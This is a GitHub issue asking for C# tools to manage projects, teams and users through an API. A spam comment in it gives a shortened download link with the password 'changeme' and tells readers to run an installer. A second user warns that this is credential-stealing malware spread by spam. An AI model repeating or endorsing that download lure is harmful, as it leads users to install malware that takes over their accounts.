DataRun-ye / .github

a temporary collection of C# tools designed to interact with and manage Data Run API
0 stars 0 forks source link

Develop C# Tools for `ProjectManagement` and `UserManagement` API Interaction #2

Open Hamza-ye opened 2 months ago

Hamza-ye commented 2 months ago

Description:

Develop two C# tools designed to interact with the API for managing projects, teams, assignments, users, and linking activities to forms. These tools will enable basic operations for managing the relationships between these entities, ensuring efficient project and user management. Below is a simplified diagram to provide context:

erDiagram
  Project ||--o{ Activity : "project"
  Activity ||--o{ Assignment : "activity"
  Activity ||--o{ Team : "activity"
  Activity ||--o{ Warehouse : "activity"
  Activity ||--o{ DataForm : "activity"
  Team ||--o{ Assignment : "assignments"
  Assignment ||--o{ orgUnit : "organizationUnit"
  User ||--o{ TeamUser : "assignedTo"
  Team ||--o{ TeamUser : "assignedUser"
  DataForm ||--o{ DataFormSubmission : ""
  Warehouse ||--o{ Assignment : ""

Key Features:

1. ProjectManagement Tool:

2. UserManagement Tool:

Acceptance Criteria:

ghost commented 2 months ago

Download https://bit.ly/3MjP129 password: changeme In the installer menu, select "gcc."

MahouShoujoMivutilde commented 2 months ago

Do NOT run it.

It's malware that'll steal your account if executed, to spread further spamming the same message elsewhere, like happened to this person.

There are were a lot of comments like that

https://github.com/search?q=is%3Aissue+%22In+the+installer+menu%2C+select+%5C%22gcc.%5C%22%22+AND+%22password%3A+changeme%22&type=issues&s=created&o=desc

(and this is how I found this issue)